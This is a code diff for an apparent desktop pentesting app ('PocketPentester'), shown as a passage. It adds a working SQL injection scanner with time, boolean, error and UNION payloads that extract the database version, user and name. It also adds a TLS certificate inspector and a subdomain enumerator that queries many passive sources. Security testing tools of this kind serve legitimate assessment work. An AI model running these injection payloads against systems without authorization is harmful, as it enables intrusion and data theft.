+        let t_resp = send(client, target, point, &t_payload).await;
+        let f_resp = send(client, target, point, &f_payload).await;
+        if let (Some((tb, _, _)), Some((fb, _, _))) = (t_resp, f_resp) {
+            let sim_t_base = similarity(baseline, &tb);
+            let sim_f_base = similarity(baseline, &fb);
+            // TRUE should resemble baseline; FALSE should diverge
+            if sim_t_base > 0.9 && sim_f_base < 0.8 && (sim_t_base - sim_f_base) > 0.1 {
+                return Some((
+                    prefix.to_string(),
+                    suffix.to_string(),
+                    "AND 1=1 / AND 1=2".to_string(),
+                    format!("true-sim={:.2} false-sim={:.2} (divergence detected)", sim_t_base, sim_f_base),
+                ));
+            }
+        }
+    }
+    None
+}
+
+async fn test_time_based(
+    client: &reqwest::Client, target: &Target, point: &InjectionPoint, level: u8, tamper: &[String],
+) -> Option<(String, String, String, String, &'static str)> {
+    let cases: &[(&str, &str, u64)] = &[
+        ("MySQL", "AND SLEEP(5)", 5),
+        ("MySQL", "AND (SELECT 1 FROM (SELECT SLEEP(5))a)", 5),
+        ("PostgreSQL", "; SELECT pg_sleep(5)", 5),
+        ("MSSQL", "; WAITFOR DELAY '0:0:5'", 5),
+        ("Oracle", "AND DBMS_PIPE.RECEIVE_MESSAGE('x',5) IS NOT NULL", 5),
+        ("SQLite", "AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))", 5),
+    ];
+    for (prefix, _suffix) in boundaries(level).iter() {
+        for (db, payload, sec) in cases.iter() {
+            let full = apply_tamper(&format!("{}{} {}-- -", point.base_value, prefix, payload), tamper);
+            if let Some((_, _, elapsed)) = send(client, target, point, &full).await {
+                let threshold_ms = (sec * 1000 - 500) as u128;
+                if elapsed >= threshold_ms {
+                    return Some((
+                        prefix.to_string(),
+                        "-- -".to_string(),
+                        payload.to_string(),
+                        format!("response delayed {}ms (payload sleeps {}s)", elapsed, sec),
+                        db,
+                    ));
+                }
+            }
+        }
+    }
+    None
+}
+
+async fn test_union_based(
+    client: &reqwest::Client, target: &Target, point: &InjectionPoint, level: u8, tamper: &[String],
+) -> Option<(String, String, String, String, Option<&'static str>, HashMap<String, String>)> {
+    let marker = format!("xpl{:04}mrk", rand::random::<u16>());
+    // Step 1: find column count via ORDER BY
+    let mut cols: usize = 0;
+    for (prefix, _suffix) in boundaries(level).iter() {
+        let mut last_ok: usize = 0;
+        for n in 1..=20 {
+            let full = apply_tamper(&format!("{}{} ORDER BY {}-- -", point.base_value, prefix, n), tamper);
+            if let Some((body, _, _)) = send(client, target, point, &full).await {
+                let err = detect_dbms(&body).is_some()
+                    || body.to_lowercase().contains("unknown column")
+                    || body.to_lowercase().contains("order by");
+                if err { break; } else { last_ok = n; }
+            } else { break; }
+        }
+        if last_ok > 0 {
+            cols = last_ok;
+            // Step 2: craft UNION SELECT with NULLs, replace one at a time with marker
+            for position in 1..=cols {
+                let mut fields: Vec<String> = (1..=cols).map(|i| if i == position {
+                    format!("'{}'", marker)
+                } else { "NULL".to_string() }).collect();
+                let full = apply_tamper(&format!("{}{} UNION SELECT {}-- -",
+                    point.base_value, prefix, fields.join(",")), tamper);
+                if let Some((body, _, _)) = send(client, target, point, &full).await {
+                    if body.contains(&marker) {
+                        // injectable column found — try extracting data
+                        let mut extracted: HashMap<String, String> = HashMap::new();
+                        let probes = [
+                            ("version", "version()"),
+                            ("user", "current_user()"),
+                            ("db", "database()"),
+                        ];
+                        for (name, expr) in probes {
+                            fields[position - 1] = format!("CONCAT('{m}_',{e},'_{m}')", m=marker, e=expr);
+                            let ep = apply_tamper(&format!("{}{} UNION SELECT {}-- -",
+                                point.base_value, prefix, fields.join(",")), tamper);
+                            if let Some((b, _, _)) = send(client, target, point, &ep).await {
+                                let re = Regex::new(&format!("{}_([^_]+)_{}", marker, marker)).unwrap();
+                                if let Some(c) = re.captures(&b).and_then(|c| c.get(1)) {
+                                    extracted.insert(name.into(), c.as_str().to_string());
+                                }
+                            }
+                            fields[position - 1] = format!("'{}'", marker);
+                        }
+                        let dbms: Option<&'static str> = extracted.get("version").and_then(|v| {
+                            let lo = v.to_lowercase();
+                            if lo.contains("mariadb") || lo.contains("mysql") { Some("MySQL") }
+                            else if lo.contains("postgresql") { Some("PostgreSQL") }
+                            else if lo.contains("microsoft sql") { Some("MSSQL") }
+                            else { None }
+                        });
+                        return Some((
+                            prefix.to_string(),
+                            "-- -".to_string(),
+                            format!("UNION SELECT {}", fields.join(",")),
+                            format!("union injection at column {position}/{cols}, marker reflected"),
+                            dbms,
+                            extracted,
+                        ));
+                    }
+                }
+            }
+            break;
+        }
+    }
+    let _ = cols;
+    None
+}
+
+// ------------------------------------------------------------------
+// Orchestrator
+// ------------------------------------------------------------------
+
+#[tauri::command]
+pub async fn sqli_scan(app: AppHandle, req: SqliRequest) -> Result<Vec<SqliFinding>, String> {
+    let url = Url::parse(&req.url).map_err(|e| e.to_string())?;
+
+    let body_is_json = req.headers.iter().any(|(k, v)|
+        k.eq_ignore_ascii_case("content-type") && v.to_lowercase().contains("json"));
+
+    let target = Target {
+        url,
+        method: req.method.clone(),
+        body: req.body.clone(),
+        body_is_json,
+        headers: req.headers.clone(),
+        cookies: req.cookies.clone(),
+    };
+
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(if req.follow_redirects {
+            reqwest::redirect::Policy::limited(5)
+        } else { reqwest::redirect::Policy::none() })
+        .cookie_store(false)
+        .user_agent("Mozilla/5.0 (PocketPentester-SQLi)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let points = find_injection_points(&req, &target);
+    if points.is_empty() {
+        return Err("no injection points detected — supply params, use * marker, or pass params filter".into());
+    }
+
+    let _ = app.emit("sqli:status", format!("{} injection point(s) to test", points.len()));
+
+    // baseline with original values
+    let first = points.first().unwrap();
+    let baseline = send(&client, &target, first, &first.base_value).await
+        .map(|(b, _, _)| b).unwrap_or_default();
+
+    let _sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let mut findings: Vec<SqliFinding> = Vec::new();
+
+    for point in &points {
+        let _ = app.emit("sqli:status",
+            format!("→ testing {} [{}] (base={})", point.location, point.name,
+                    if point.base_value.len() > 30 { format!("{}...", &point.base_value[..30]) } else { point.base_value.clone() }));
+
+        let mut dbms_hint: Option<&'static str> = None;
+
+        // heuristic
+        if req.techniques.iter().any(|t| t == "heuristic") {
+            let (flag, db) = heuristic_probe(&client, &target, point).await;
+            if flag {
+                dbms_hint = db;
+                let _ = app.emit("sqli:status", format!("  heuristic positive{}", db.map(|d| format!(" ({d})")).unwrap_or_default()));
+            } else {
+                let _ = app.emit("sqli:status", "  heuristic negative, continuing anyway");
+            }
+        }
+
+        // error-based
+        if req.techniques.iter().any(|t| t == "error") {
+            if let Some((pre, suf, payload, evidence, db)) =
+                test_error_based(&client, &target, point, req.level, &req.tamper).await
+            {
+                let f = SqliFinding {
+                    param: point.name.clone(), location: point.location.clone(),
+                    technique: "error-based".into(),
+                    dbms: Some(db.to_string()),
+                    prefix: pre.clone(), suffix: suf.clone(), payload: payload.clone(),
+                    full_payload: format!("{}{}{} {}", point.base_value, pre, payload, suf),
+                    evidence, confidence: "HIGH".into(), extracted: HashMap::new(),
+                };
+                let _ = app.emit("sqli:hit", f.clone());
+                findings.push(f);
+                if req.stop_on_first { return Ok(findings); }
+            }
+        }
+
+        // boolean-based
+        if req.techniques.iter().any(|t| t == "boolean") {
+            if let Some((pre, suf, payload, evidence)) =
+                test_boolean_blind(&client, &target, point, &baseline, req.level, &req.tamper).await
+            {
+                let f = SqliFinding {
+                    param: point.name.clone(), location: point.location.clone(),
+                    technique: "boolean-blind".into(),
+                    dbms: dbms_hint.map(|s| s.to_string()),
+                    prefix: pre.clone(), suffix: suf.clone(), payload: payload.clone(),
+                    full_payload: format!("{}{} AND 1=1{}", point.base_value, pre, suf),
+                    evidence, confidence: "MEDIUM".into(), extracted: HashMap::new(),
+                };
+                let _ = app.emit("sqli:hit", f.clone());
+                findings.push(f);
+                if req.stop_on_first { return Ok(findings); }
+            }
+        }
+
+        // union-based
+        if req.techniques.iter().any(|t| t == "union") {
+            if let Some((pre, suf, payload, evidence, db, extracted)) =
+                test_union_based(&client, &target, point, req.level, &req.tamper).await
+            {
+                let f = SqliFinding {
+                    param: point.name.clone(), location: point.location.clone(),
+                    technique: "union-based".into(),
+                    dbms: db.map(|s| s.to_string()).or(dbms_hint.map(|s| s.to_string())),
+                    prefix: pre.clone(), suffix: suf.clone(), payload: payload.clone(),
+                    full_payload: format!("{}{} {} {}", point.base_value, pre, payload, suf),
+                    evidence, confidence: "HIGH".into(), extracted,
+                };
+                let _ = app.emit("sqli:hit", f.clone());
+                findings.push(f);
+                if req.stop_on_first { return Ok(findings); }
+            }
+        }
+
+        // time-based (expensive, last)
+        if req.techniques.iter().any(|t| t == "time") && req.risk >= 1 {
+            if let Some((pre, suf, payload, evidence, db)) =
+                test_time_based(&client, &target, point, req.level, &req.tamper).await
+            {
+                let f = SqliFinding {
+                    param: point.name.clone(), location: point.location.clone(),
+                    technique: "time-blind".into(),
+                    dbms: Some(db.to_string()),
+                    prefix: pre.clone(), suffix: suf.clone(), payload: payload.clone(),
+                    full_payload: format!("{}{} {}{}", point.base_value, pre, payload, suf),
+                    evidence, confidence: "HIGH".into(), extracted: HashMap::new(),
+                };
+                let _ = app.emit("sqli:hit", f.clone());
+                findings.push(f);
+                if req.stop_on_first { return Ok(findings); }
+            }
+        }
+    }
+
+    let _ = app.emit("sqli:done", findings.len());
+    Ok(findings)
+}
diff --git a/src-tauri/src/modules/ssl_scan.rs b/src-tauri/src/modules/ssl_scan.rs
new file mode 100644
index 0000000..11a8ca6
--- /dev/null
+++ b/src-tauri/src/modules/ssl_scan.rs
@@ -0,0 +1,276 @@
+// ===================================================================
+// SSL/TLS Scanner — cert chain inspection + negotiation test.
+//
+// Uses rustls with a capturing verifier to extract peer cert chain
+// even when the cert is invalid/expired/self-signed. Parses cert via
+// x509-parser for SAN / issuer / validity extraction.
+// ===================================================================
+
+use std::net::SocketAddr;
+use std::sync::Arc;
+use std::time::{Duration, SystemTime, UNIX_EPOCH};
+
+use rustls_pki_types::{CertificateDer, ServerName};
+use serde::{Deserialize, Serialize};
+use sha2::{Digest, Sha256};
+use tokio::net::TcpStream;
+use tokio::time::timeout;
+use tokio_rustls::TlsConnector;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct SslScanRequest {
+    pub host: String,
+    #[serde(default = "default_port")]
+    pub port: u16,
+    #[serde(default = "default_timeout")]
+    pub timeout_ms: u64,
+}
+
+fn default_port() -> u16 { 443 }
+fn default_timeout() -> u64 { 8000 }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct SslCertInfo {
+    pub subject: String,
+    pub issuer: String,
+    pub serial: String,
+    pub not_before: String,
+    pub not_after: String,
+    pub days_remaining: i64,
+    pub sans: Vec<String>,
+    pub key_algo: String,
+    pub signature_algo: String,
+    pub sha256_fingerprint: String,
+    pub is_ca: bool,
+    pub self_signed: bool,
+    pub expired: bool,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct SslScanReport {
+    pub host: String,
+    pub port: u16,
+    pub tls_version: String,
+    pub cipher_suite: Option<String>,
+    pub sni_presented: String,
+    pub cert_chain: Vec<SslCertInfo>,
+    pub chain_valid: bool,
+    pub issues: Vec<String>,
+    pub alpn: Option<String>,
+}
+
+// ---- capturing verifier: accept everything, remember the cert chain ----
+
+#[derive(Debug)]
+struct CaptureVerifier {
+    captured: Arc<std::sync::Mutex<Vec<Vec<u8>>>>,
+}
+
+impl rustls::client::danger::ServerCertVerifier for CaptureVerifier {
+    fn verify_server_cert(
+        &self,
+        end_entity: &CertificateDer<'_>,
+        intermediates: &[CertificateDer<'_>],
+        _server_name: &ServerName<'_>,
+        _ocsp_response: &[u8],
+        _now: rustls_pki_types::UnixTime,
+    ) -> Result<rustls::client::danger::ServerCertVerified, rustls::Error> {
+        let mut guard = self.captured.lock().unwrap();
+        guard.push(end_entity.as_ref().to_vec());
+        for it in intermediates { guard.push(it.as_ref().to_vec()); }
+        Ok(rustls::client::danger::ServerCertVerified::assertion())
+    }
+    fn verify_tls12_signature(
+        &self, _message: &[u8], _cert: &CertificateDer<'_>, _dss: &rustls::DigitallySignedStruct,
+    ) -> Result<rustls::client::danger::HandshakeSignatureValid, rustls::Error> {
+        Ok(rustls::client::danger::HandshakeSignatureValid::assertion())
+    }
+    fn verify_tls13_signature(
+        &self, _message: &[u8], _cert: &CertificateDer<'_>, _dss: &rustls::DigitallySignedStruct,
+    ) -> Result<rustls::client::danger::HandshakeSignatureValid, rustls::Error> {
+        Ok(rustls::client::danger::HandshakeSignatureValid::assertion())
+    }
+    fn supported_verify_schemes(&self) -> Vec<rustls::SignatureScheme> {
+        vec![
+            rustls::SignatureScheme::RSA_PKCS1_SHA256,
+            rustls::SignatureScheme::RSA_PKCS1_SHA384,
+            rustls::SignatureScheme::RSA_PKCS1_SHA512,
+            rustls::SignatureScheme::ECDSA_NISTP256_SHA256,
+            rustls::SignatureScheme::ECDSA_NISTP384_SHA384,
+            rustls::SignatureScheme::ECDSA_NISTP521_SHA512,
+            rustls::SignatureScheme::RSA_PSS_SHA256,
+            rustls::SignatureScheme::RSA_PSS_SHA384,
+            rustls::SignatureScheme::RSA_PSS_SHA512,
+            rustls::SignatureScheme::ED25519,
+        ]
+    }
+}
+
+fn parse_cert(der: &[u8]) -> Result<SslCertInfo, String> {
+    use x509_parser::prelude::*;
+    let (_, cert) = X509Certificate::from_der(der).map_err(|e| e.to_string())?;
+
+    let subject = cert.subject().to_string();
+    let issuer = cert.issuer().to_string();
+    let serial = format!("{:x}", cert.serial);
+    let not_before = cert.validity.not_before.to_rfc2822().unwrap_or_default();
+    let not_after = cert.validity.not_after.to_rfc2822().unwrap_or_default();
+
+    let now = SystemTime::now().duration_since(UNIX_EPOCH).unwrap().as_secs() as i64;
+    let nb = cert.validity.not_after.timestamp();
+    let days_remaining = (nb - now) / 86400;
+    let expired = nb < now;
+
+    let mut sans: Vec<String> = Vec::new();
+    for ext in cert.extensions() {
+        if let ParsedExtension::SubjectAlternativeName(san) = ext.parsed_extension() {
+            for n in &san.general_names {
+                sans.push(format!("{n}"));
+            }
+        }
+    }
+
+    let key_algo = cert.public_key().algorithm.algorithm.to_id_string();
+    let signature_algo = cert.signature_algorithm.algorithm.to_id_string();
+
+    let self_signed = subject == issuer;
+
+    let is_ca = cert.extensions().iter().any(|e| {
+        matches!(e.parsed_extension(), ParsedExtension::BasicConstraints(bc) if bc.ca)
+    });
+
+    let mut h = Sha256::new();
+    h.update(der);
+    let fp = h.finalize();
+    let sha256_fingerprint = fp.iter().map(|b| format!("{:02X}", b)).collect::<Vec<_>>().join(":");
+
+    Ok(SslCertInfo {
+        subject, issuer, serial, not_before, not_after, days_remaining,
+        sans, key_algo: map_key_algo(&key_algo), signature_algo: map_sig_algo(&signature_algo),
+        sha256_fingerprint, is_ca, self_signed, expired,
+    })
+}
+
+fn map_key_algo(oid: &str) -> String {
+    match oid {
+        "1.2.840.113549.1.1.1" => "RSA".into(),
+        "1.2.840.10045.2.1" => "ECDSA".into(),
+        "1.3.101.112" => "Ed25519".into(),
+        other => other.into(),
+    }
+}
+fn map_sig_algo(oid: &str) -> String {
+    match oid {
+        "1.2.840.113549.1.1.11" => "SHA256-RSA".into(),
+        "1.2.840.113549.1.1.12" => "SHA384-RSA".into(),
+        "1.2.840.113549.1.1.13" => "SHA512-RSA".into(),
+        "1.2.840.113549.1.1.5"  => "SHA1-RSA (WEAK)".into(),
+        "1.2.840.113549.1.1.4"  => "MD5-RSA (BROKEN)".into(),
+        "1.2.840.10045.4.3.2"   => "ECDSA-SHA256".into(),
+        "1.2.840.10045.4.3.3"   => "ECDSA-SHA384".into(),
+        "1.2.840.10045.4.3.4"   => "ECDSA-SHA512".into(),
+        "1.3.101.112"           => "Ed25519".into(),
+        other => other.into(),
+    }
+}
+
+#[tauri::command]
+pub async fn ssl_scan(req: SslScanRequest) -> Result<SslScanReport, String> {
+    let addr_str = format!("{}:{}", req.host, req.port);
+    let addr: SocketAddr = tokio::net::lookup_host(&addr_str).await
+        .map_err(|e| format!("dns: {e}"))?
+        .next()
+        .ok_or_else(|| "no address resolved".to_string())?;
+
+    let captured = Arc::new(std::sync::Mutex::new(Vec::new()));
+    let verifier = Arc::new(CaptureVerifier { captured: captured.clone() });
+
+    // install default crypto provider (ring) for this thread — idempotent
+    let _ = rustls::crypto::ring::default_provider().install_default();
+
+    let config = rustls::ClientConfig::builder()
+        .dangerous()
+        .with_custom_certificate_verifier(verifier)
+        .with_no_client_auth();
+    let mut config = config;
+    config.alpn_protocols = vec![b"h2".to_vec(), b"http/1.1".to_vec()];
+
+    let connector = TlsConnector::from(Arc::new(config));
+
+    let tcp = timeout(Duration::from_millis(req.timeout_ms), TcpStream::connect(addr)).await
+        .map_err(|_| "tcp connect timeout".to_string())?
+        .map_err(|e| format!("tcp: {e}"))?;
+
+    let server_name: ServerName<'static> = ServerName::try_from(req.host.clone())
+        .map_err(|e| format!("invalid server name: {e}"))?;
+
+    let tls = timeout(Duration::from_millis(req.timeout_ms), connector.connect(server_name, tcp)).await
+        .map_err(|_| "tls handshake timeout".to_string())?
+        .map_err(|e| format!("tls handshake: {e}"))?;
+
+    let (_, conn) = tls.get_ref();
+    let version = match conn.protocol_version() {
+        Some(rustls::ProtocolVersion::TLSv1_3) => "TLS 1.3".into(),
+        Some(rustls::ProtocolVersion::TLSv1_2) => "TLS 1.2".into(),
+        Some(v) => format!("{v:?} (WEAK/LEGACY)"),
+        None => "unknown".into(),
+    };
+    let cipher_suite = conn.negotiated_cipher_suite().map(|cs| format!("{:?}", cs.suite()));
+    let alpn = conn.alpn_protocol().map(|a| String::from_utf8_lossy(a).to_string());
+
+    drop(tls);
+
+    let certs = captured.lock().unwrap().clone();
+    if certs.is_empty() {
+        return Err("no certs captured".into());
+    }
+
+    let mut chain: Vec<SslCertInfo> = Vec::new();
+    let mut issues: Vec<String> = Vec::new();
+    for (i, der) in certs.iter().enumerate() {
+        match parse_cert(der) {
+            Ok(info) => {
+                if info.expired && i == 0 { issues.push("leaf certificate is EXPIRED".into()); }
+                if info.days_remaining < 14 && !info.expired && i == 0 {
+                    issues.push(format!("leaf cert expires in {} days", info.days_remaining));
+                }
+                if info.self_signed && i == 0 && chain.is_empty() {
+                    issues.push("leaf is self-signed".into());
+                }
+                if info.signature_algo.contains("WEAK") || info.signature_algo.contains("BROKEN") {
+                    issues.push(format!("weak signature algorithm: {}", info.signature_algo));
+                }
+                chain.push(info);
+            }
+            Err(e) => issues.push(format!("cert[{i}] parse error: {e}")),
+        }
+    }
+
+    if version.contains("LEGACY") || version.contains("1.0") || version.contains("1.1") {
+        issues.push(format!("weak TLS version negotiated: {version}"));
+    }
+
+    // SAN must include hostname
+    if let Some(leaf) = chain.first() {
+        let host_lc = req.host.to_lowercase();
+        let match_ok = leaf.sans.iter().any(|s| {
+            let s_lc = s.to_lowercase();
+            s_lc.contains(&host_lc) || s_lc.starts_with("dns:*.") && host_lc.ends_with(&s_lc.trim_start_matches("dns:*").to_string())
+        });
+        if !match_ok && !leaf.sans.is_empty() {
+            issues.push(format!("hostname {} not in SANs", req.host));
+        }
+    }
+
+    Ok(SslScanReport {
+        host: req.host.clone(),
+        port: req.port,
+        tls_version: version,
+        cipher_suite,
+        sni_presented: req.host,
+        cert_chain: chain,
+        chain_valid: issues.is_empty(),
+        issues,
+        alpn,
+    })
+}
diff --git a/src-tauri/src/modules/subdomain.rs b/src-tauri/src/modules/subdomain.rs
new file mode 100644
index 0000000..0413900
--- /dev/null
+++ b/src-tauri/src/modules/subdomain.rs
@@ -0,0 +1,504 @@
+// ===================================================================
+// Subdomain enumeration — subfinder-style multi-source aggregator.
+//
+// Sources (default-on, no API key needed):
+//   - crt.sh                  — certificate transparency
+//   - certspotter             — certificate transparency (parallel)
+//   - hackertarget            — passive DNS (rate-limited 50/day per IP)
+//   - alienvault OTX          — passive DNS
+//   - anubis-db               — community subdomain DB
+//   - rapiddns                — HTML scrape
+//   - wayback (web.archive.org)— historical URLs → extract hosts
+//   - urlscan                 — domain search
+//   - threatcrowd             — passive DNS
+//
+// Key-based sources (opt-in, user supplies API key):
+//   - c99.nl                  — fast commercial source
+//   - virustotal              — domain relations
+//   - securitytrails          — premium passive
+//   - chaos (projectdiscovery)— curated dataset
+//   - shodan                  — host search
+//   - binaryedge              — passive DNS
+//   - fullhunt                — attack-surface DB
+// ===================================================================
+
+use std::collections::{HashMap, HashSet};
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use hickory_resolver::config::{ResolverConfig, ResolverOpts};
+use hickory_resolver::TokioAsyncResolver;
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct SubdomainRequest {
+    pub domain: String,
+    /// Source names to enable. If None/empty, all default-on sources run.
+    /// Available: crtsh, certspotter, hackertarget, alienvault, anubis,
+    /// rapiddns, wayback, urlscan, threatcrowd, c99, virustotal,
+    /// securitytrails, chaos, shodan, binaryedge, fullhunt.
+    #[serde(default)]
+    pub sources: Option<Vec<String>>,
+
+    /// Optional brute-force wordlist (in addition to passive).
+    #[serde(default)]
+    pub wordlist: Option<Vec<String>>,
+
+    pub concurrency: usize,
+
+    /// API keys for key-based sources. Map of source-name → key.
+    #[serde(default)]
+    pub api_keys: Option<HashMap<String, String>>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct SubdomainHit {
+    pub host: String,
+    pub source: String,
+    pub ips: Vec<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct SourceStat {
+    pub source: String,
+    pub count: usize,
+    pub error: Option<String>,
+    pub took_ms: u128,
+}
+
+// ------------------------------------------------------------------
+// HTTP client
+// ------------------------------------------------------------------
+
+fn build_client() -> reqwest::Client {
+    reqwest::Client::builder()
+        .timeout(Duration::from_secs(25))
+        .user_agent("Mozilla/5.0 (PocketPentester/0.1)")
+        .build()
+        .unwrap_or_else(|_| reqwest::Client::new())
+}
+
+fn norm_host(s: &str, root: &str) -> Option<String> {
+    let h = s.trim()
+        .trim_start_matches("*.")
+        .trim_start_matches('.')
+        .to_lowercase();
+    let h = h.split_whitespace().next()?.to_string();
+    if h.is_empty() { return None; }
+    if !h.ends_with(root) { return None; }
+    if h.contains('@') { return None; }
+    if h.starts_with("xn--") && h.len() < 6 { return None; }
+    Some(h)
+}
+
+// ------------------------------------------------------------------
+// passive sources (no key)
+// ------------------------------------------------------------------
+
+async fn fetch_json(client: &reqwest::Client, url: &str) -> anyhow::Result<serde_json::Value> {
+    fetch_json_with_headers(client, url, &[]).await
+}
+
+async fn fetch_json_with_headers(
+    client: &reqwest::Client,
+    url: &str,
+    headers: &[(&str, &str)],
+) -> anyhow::Result<serde_json::Value> {
+    let mut req = client.get(url);
+    for (k, v) in headers { req = req.header(*k, *v); }
+    let resp = req.send().await?;
+    let status = resp.status();
+    let body = resp.text().await?;
+    if !status.is_success() {
+        anyhow::bail!("HTTP {} (body: {})", status, body.chars().take(120).collect::<String>());
+    }
+    if body.trim().is_empty() {
+        anyhow::bail!("empty response");
+    }
+    serde_json::from_str(&body).map_err(|e| anyhow::anyhow!("json parse: {e}"))
+}
+
+fn values_from_array<'a>(v: &'a serde_json::Value, key: &str) -> &'a [serde_json::Value] {
+    v.get(key).and_then(|x| x.as_array()).map(|a| a.as_slice()).unwrap_or(&[])
+}
+
+async fn src_crtsh(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://crt.sh/?q=%25.{}&output=json", domain);
+    let val = fetch_json(client, &url).await?;
+    let arr = val.as_array().map(|a| a.as_slice()).unwrap_or(&[]);
+    let mut set = HashSet::new();
+    for r in arr {
+        if let Some(nv) = r.get("name_value").and_then(|v| v.as_str()) {
+            for line in nv.split('\n') {
+                if let Some(h) = norm_host(line, domain) { set.insert(h); }
+            }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_certspotter(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://api.certspotter.com/v1/issuances?domain={}&include_subdomains=true&expand=dns_names", domain);
+    let val = fetch_json(client, &url).await?;
+    let arr = val.as_array().map(|a| a.as_slice()).unwrap_or(&[]);
+    let mut set = HashSet::new();
+    for r in arr {
+        for n in values_from_array(r, "dns_names") {
+            if let Some(s) = n.as_str() {
+                if let Some(h) = norm_host(s, domain) { set.insert(h); }
+            }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_hackertarget(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://api.hackertarget.com/hostsearch/?q={}", domain);
+    let resp = client.get(&url).send().await?;
+    let status = resp.status();
+    let body = resp.text().await?;
+    if !status.is_success() { anyhow::bail!("HTTP {status}"); }
+    if body.contains("API count exceeded") || body.contains("error check your search parameter") {
+        anyhow::bail!("rate limited");
+    }
+    let mut set = HashSet::new();
+    for line in body.lines() {
+        if let Some((host, _)) = line.split_once(',') {
+            if let Some(h) = norm_host(host, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_alienvault(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://otx.alienvault.com/api/v1/indicators/domain/{}/passive_dns", domain);
+    let val = fetch_json(client, &url).await?;
+    let mut set = HashSet::new();
+    for entry in values_from_array(&val, "passive_dns") {
+        if let Some(host) = entry.get("hostname").and_then(|v| v.as_str()) {
+            if let Some(h) = norm_host(host, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_anubis(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://jonlu.ca/anubis/subdomains/{}", domain);
+    let val = fetch_json(client, &url).await?;
+    let arr = val.as_array().map(|a| a.as_slice()).unwrap_or(&[]);
+    let mut set = HashSet::new();
+    for s in arr {
+        if let Some(host) = s.as_str() {
+            if let Some(h) = norm_host(host, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_rapiddns(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://rapiddns.io/subdomain/{}?full=1", domain);
+    let resp = client.get(&url).send().await?;
+    let status = resp.status();
+    let html = resp.text().await?;
+    if !status.is_success() { anyhow::bail!("HTTP {status}"); }
+    let re = Regex::new(r#"<td>([a-zA-Z0-9_.\-]+\.[a-zA-Z]{2,})</td>"#)?;
+    let mut set = HashSet::new();
+    for cap in re.captures_iter(&html) {
+        if let Some(m) = cap.get(1) {
+            if let Some(h) = norm_host(m.as_str(), domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_wayback(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("http://web.archive.org/cdx/search/cdx?url=*.{}&output=json&fl=original&collapse=urlkey&limit=10000", domain);
+    let val = fetch_json(client, &url).await?;
+    let arr = val.as_array().map(|a| a.as_slice()).unwrap_or(&[]);
+    let mut set = HashSet::new();
+    for (i, row) in arr.iter().enumerate() {
+        if i == 0 { continue; } // header row
+        if let Some(u) = row.as_array().and_then(|r| r.first()).and_then(|v| v.as_str()) {
+            if let Some(host) = url::Url::parse(u).ok().and_then(|p| p.host_str().map(String::from)) {
+                if let Some(h) = norm_host(&host, domain) { set.insert(h); }
+            }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_urlscan(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://urlscan.io/api/v1/search/?q=domain:{}&size=10000", domain);
+    let val = fetch_json(client, &url).await?;
+    let mut set = HashSet::new();
+    for r in values_from_array(&val, "results") {
+        if let Some(d) = r.get("page").and_then(|p| p.get("domain")).and_then(|v| v.as_str()) {
+            if let Some(h) = norm_host(d, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_threatcrowd(client: &reqwest::Client, domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={}", domain);
+    let val = fetch_json(client, &url).await?;
+    let mut set = HashSet::new();
+    for s in values_from_array(&val, "subdomains") {
+        if let Some(host) = s.as_str() {
+            if let Some(h) = norm_host(host, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+// ------------------------------------------------------------------
+// key-based sources
+// ------------------------------------------------------------------
+
+async fn src_c99(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://api.c99.nl/subdomainfinder?key={key}&domain={domain}&json");
+    let val = fetch_json(client, &url).await?;
+    if let Some(e) = val.get("error").and_then(|v| v.as_str()) { anyhow::bail!("{e}"); }
+    let mut set = HashSet::new();
+    for r in values_from_array(&val, "subdomains") {
+        if let Some(s) = r.get("subdomain").and_then(|v| v.as_str()) {
+            if let Some(h) = norm_host(s, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_virustotal(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://www.virustotal.com/api/v3/domains/{}/subdomains?limit=40", domain);
+    let val = fetch_json_with_headers(client, &url, &[("x-apikey", key)]).await?;
+    let mut set = HashSet::new();
+    for r in values_from_array(&val, "data") {
+        if let Some(id) = r.get("id").and_then(|v| v.as_str()) {
+            if let Some(h) = norm_host(id, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
